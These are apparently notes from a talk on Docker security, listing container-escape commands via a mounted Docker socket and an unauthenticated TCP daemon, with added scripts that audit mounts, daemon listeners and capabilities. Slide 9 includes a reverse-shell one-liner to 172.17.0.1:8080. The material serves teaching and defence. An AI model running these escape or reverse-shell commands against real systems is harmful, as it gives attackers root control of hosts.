The speaker discussed the Docker attack surface and demonstrated how an attacker who controls a container can escape it and gain access to the host machine.
8. Some containers require /var/run/docker.sock to be mounted into the container.
   - It is required when the container needs to interact with the host's Docker daemon.
   - For example: a "Dockerized" host monitoring application.
   Commands shown:
     docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
     docker exec -it <id> sh
     apk update
     apk add -U docker
     docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh
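The two bind mounts used on this slide (the daemon socket and the host root) are exactly what a defender should be looking for in running containers. The following audit script is an added example, not part of the talk: it reads the JSON that `docker inspect` prints and flags bind mounts whose host source is the Docker socket or `/`. The inspect output embedded below is constructed to resemble what the slide's containers would produce; real use would feed it `docker inspect $(docker ps -q)`.

```python
"""Flag containers whose bind mounts expose the Docker socket or the host root.

Added example (not from the talk).  Input is the JSON printed by
`docker inspect`; output is one line per risky bind mount.  The sample
below is constructed to look like inspect output for the containers
started on the slide.  Usage with live data:
    docker inspect $(docker ps -q) > containers.json
    python3 audit_mounts.py containers.json
"""
import json
import sys

# Host paths that, once bind-mounted into a container, hand it control of
# the host: the daemon socket (either location) gives full API access, and
# a host root mount exposes every file, read-only or not.
SENSITIVE_SOURCES = {
    "/var/run/docker.sock": "Docker daemon socket: full control of the host daemon",
    "/run/docker.sock": "Docker daemon socket: full control of the host daemon",
    "/": "host root filesystem mounted into the container",
}

# Constructed sample: trimmed `docker inspect` output for three containers,
# two of them mirroring the slide and one harmless one with a named volume.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/monitoring",
        "Mounts": [
            {"Type": "bind", "Source": "/var/run/docker.sock",
             "Destination": "/var/run/docker.sock", "RW": True},
        ],
    },
    {
        "Name": "/escape",
        "Mounts": [
            {"Type": "bind", "Source": "/", "Destination": "/test", "RW": False},
        ],
    },
    {
        "Name": "/web",
        "Mounts": [
            {"Type": "volume", "Name": "webdata",
             "Source": "/var/lib/docker/volumes/webdata/_data",
             "Destination": "/data", "RW": True},
        ],
    },
])


def normalise(path):
    """Strip a trailing slash so '/var/run/docker.sock/' compares like the bare path."""
    return path if path == "/" else path.rstrip("/")


def find_risky_mounts(inspect_json):
    """Return (container, source, destination, mode, reason) for each risky bind mount."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "?").lstrip("/")
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue  # named volumes live under /var/lib/docker, not on the host root
            source = normalise(mount.get("Source", ""))
            reason = SENSITIVE_SOURCES.get(source)
            if reason:
                mode = "rw" if mount.get("RW", True) else "ro"
                findings.append((name, source, mount.get("Destination"), mode, reason))
    return findings


def main(argv):
    data = open(argv[1]).read() if len(argv) > 1 else SAMPLE_INSPECT
    findings = find_risky_mounts(data)
    for name, src, dst, mode, reason in findings:
        print(f"[RISK] {name}: {src} -> {dst} ({mode}): {reason}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The script treats a read-only root mount as just as serious as a read-write one, since the slide shows that `:ro` still lets the container read every host file; the exit code is non-zero when anything is found so it can run from a cron job or CI step.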
9. The Docker daemon can also listen on a TCP socket, which allows interacting with a remote Docker daemon.
   - No authentication is required by default.
   - Let's gain a shell!
   Commands shown (first expose the daemon on TCP by editing the systemd unit, then use the API and the CLI against it):
     sudo apt install jq
     sudo vi /lib/systemd/system/docker.service
       ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
     sudo systemctl daemon-reload
     sudo service docker restart
     curl http://localhost:2375/containers/json | jq
     docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
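The ExecStart line edited on this slide is the single setting that turns a local-only daemon into an unauthenticated remote one. The script below is an added example, not from the talk: it parses a `dockerd` command line, reports every `-H tcp://` listener, and tells the weak form (no `--tlsverify`) from a hardened one that requires client certificates. Both sample lines are constructed; the hardened one uses the conventional TLS port 2376 and assumes certificate paths under /etc/docker that you would substitute with your own. It reads only the unit file's ExecStart line, so hosts configured in /etc/docker/daemon.json are out of its scope.

```python
"""Check a dockerd command line for a TCP listener without TLS client auth.

Added example, not from the talk.  Slide 9 edits docker.service so that
ExecStart contains `-H tcp://0.0.0.0:2375`; without `--tlsverify` the daemon
then accepts API calls from anyone who can reach the port.  This script
parses an ExecStart= line (constructed samples below, or the real one from
/lib/systemd/system/docker.service) and reports each tcp:// listener together
with whether TLS verification is enabled.
"""
import shlex
from urllib.parse import urlsplit

# Constructed: the weak line from the slide and a hardened counterpart.
# The certificate paths are placeholders for this example.
WEAK_EXECSTART = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"
HARDENED_EXECSTART = (
    "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2376 "
    "--tlsverify --tlscacert=/etc/docker/ca.pem "
    "--tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem"
)


def parse_hosts(execstart):
    """Return ([host URLs], tlsverify_enabled) from an ExecStart= line."""
    cmdline = execstart.split("=", 1)[1] if execstart.startswith("ExecStart=") else execstart
    args = shlex.split(cmdline)
    hosts, tlsverify = [], False
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        elif arg == "--tlsverify" or arg.startswith("--tlsverify="):
            # dockerd accepts both a bare --tlsverify and --tlsverify=true/false
            tlsverify = not arg.endswith("=false")
        i += 1
    return hosts, tlsverify


def audit_execstart(execstart):
    """Return one finding string per tcp:// listener (empty list when there is none)."""
    hosts, tlsverify = parse_hosts(execstart)
    findings = []
    for host in hosts:
        if not host.startswith("tcp://"):
            continue  # fd:// and unix:// sockets are local and protected by file permissions
        addr = urlsplit(host).hostname or "0.0.0.0"
        exposure = "all interfaces" if addr in ("0.0.0.0", "::") else addr
        if tlsverify:
            findings.append(f"{host}: TCP listener on {exposure}, TLS client verification on")
        else:
            findings.append(f"{host}: UNAUTHENTICATED TCP listener on {exposure} (no --tlsverify)")
    return findings


def is_exposed(execstart):
    """True when any tcp:// listener is configured without --tlsverify."""
    return any("UNAUTHENTICATED" in f for f in audit_execstart(execstart))


def audit_unit_file(path="/lib/systemd/system/docker.service"):
    """Audit the ExecStart= line(s) of the systemd unit edited on the slide."""
    with open(path) as fh:
        return [f for line in fh if line.startswith("ExecStart=")
                for f in audit_execstart(line.strip())]


if __name__ == "__main__":
    for label, line in (("weak", WEAK_EXECSTART), ("hardened", HARDENED_EXECSTART)):
        print(f"{label}: exposed={is_exposed(line)}")
        for finding in audit_execstart(line):
            print("   ", finding)
```

A daemon that passes this check still exposes the full API to every holder of a valid client certificate, which is equivalent to root on the host, so the TLS listener should additionally be firewalled to the management hosts that need it.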
10. Linux capabilities: compare a default container with one started with --cap-drop=NET_RAW.
    - docker run -itd alpine
    - docker run --rm -it --cap-drop=NET_RAW alpine sh
    - ping 127.0.0.1 -c 2
    - Printing capabilities: capsh --print
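`capsh --print` is not always available inside a minimal image, but the same capability set is visible as a hex bitmask in /proc/self/status. The script below is an added example, not from the talk: it decodes the CapEff mask into capability names, checks whether NET_RAW is present, and diffs the result against Docker's default capability set so a hardened container can be verified from the inside. The two status excerpts are constructed to match a default container (CapEff 0xa80425fb) and one run with --cap-drop=NET_RAW (bit 13 cleared); when run on a real system it also decodes the current process.

```python
"""Decode a container's effective capability set and check that NET_RAW is gone.

Added example, not from the talk.  Slide 10 drops NET_RAW with
`docker run --cap-drop=NET_RAW` and prints capabilities with `capsh --print`.
Inside a container the same information is in /proc/self/status as the hex
bitmask CapEff; this script decodes that mask into names and compares it
with Docker's default set.  The two status excerpts are constructed.
"""

# Linux capability numbers (bit positions in the Cap* masks), from
# include/uapi/linux/capability.h.
CAP_NAMES = {
    0: "CHOWN", 1: "DAC_OVERRIDE", 2: "DAC_READ_SEARCH", 3: "FOWNER", 4: "FSETID",
    5: "KILL", 6: "SETGID", 7: "SETUID", 8: "SETPCAP", 9: "LINUX_IMMUTABLE",
    10: "NET_BIND_SERVICE", 11: "NET_BROADCAST", 12: "NET_ADMIN", 13: "NET_RAW",
    14: "IPC_LOCK", 15: "IPC_OWNER", 16: "SYS_MODULE", 17: "SYS_RAWIO", 18: "SYS_CHROOT",
    19: "SYS_PTRACE", 20: "SYS_PACCT", 21: "SYS_ADMIN", 22: "SYS_BOOT", 23: "SYS_NICE",
    24: "SYS_RESOURCE", 25: "SYS_TIME", 26: "SYS_TTY_CONFIG", 27: "MKNOD", 28: "LEASE",
    29: "AUDIT_WRITE", 30: "AUDIT_CONTROL", 31: "SETFCAP", 32: "MAC_OVERRIDE",
    33: "MAC_ADMIN", 34: "SYSLOG", 35: "WAKE_ALARM", 36: "BLOCK_SUSPEND", 37: "AUDIT_READ",
    38: "PERFMON", 39: "BPF", 40: "CHECKPOINT_RESTORE",
}

# Capabilities Docker grants a non-privileged container by default.
DOCKER_DEFAULT_CAPS = {
    "CHOWN", "DAC_OVERRIDE", "FSETID", "FOWNER", "MKNOD", "NET_RAW", "SETGID",
    "SETUID", "SETFCAP", "SETPCAP", "NET_BIND_SERVICE", "SYS_CHROOT", "KILL",
    "AUDIT_WRITE",
}

# Constructed /proc/self/status excerpts: a default container, and one run
# with --cap-drop=NET_RAW (bit 13, value 0x2000, cleared from every mask).
STATUS_DEFAULT = ("Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n"
                  "CapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n")
STATUS_NO_NET_RAW = ("Name:\tsh\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80405fb\n"
                     "CapEff:\t00000000a80405fb\nCapBnd:\t00000000a80405fb\n")


def cap_mask_from_status(status_text, field="CapEff"):
    """Extract the hex mask of one Cap* field from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith(field + ":"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError(f"{field} not found in status text")


def decode_caps(mask):
    """Turn a capability bitmask into the set of capability names (as capsh --print lists them)."""
    return {CAP_NAMES.get(bit, f"CAP_{bit}")
            for bit in range(mask.bit_length()) if (mask >> bit) & 1}


def has_cap(status_text, name):
    """True when the effective set in status_text contains the named capability."""
    return name in decode_caps(cap_mask_from_status(status_text))


def compare_with_default(status_text):
    """Return (dropped, added) relative to Docker's default set."""
    caps = decode_caps(cap_mask_from_status(status_text))
    return DOCKER_DEFAULT_CAPS - caps, caps - DOCKER_DEFAULT_CAPS


if __name__ == "__main__":
    samples = [("default container", STATUS_DEFAULT),
               ("--cap-drop=NET_RAW", STATUS_NO_NET_RAW)]
    try:
        samples.append(("this process", open("/proc/self/status").read()))
    except OSError:
        pass  # not on Linux: only the constructed samples are decoded
    for label, text in samples:
        dropped, added = compare_with_default(text)
        print(f"{label}: NET_RAW={'yes' if has_cap(text, 'NET_RAW') else 'no'} "
              f"dropped={sorted(dropped)} added={sorted(added)}")
```

The "added" set is the more interesting half of the diff in an audit: anything beyond Docker's defaults, such as SYS_ADMIN or NET_ADMIN, points at a `--cap-add` or `--privileged` flag that should be justified.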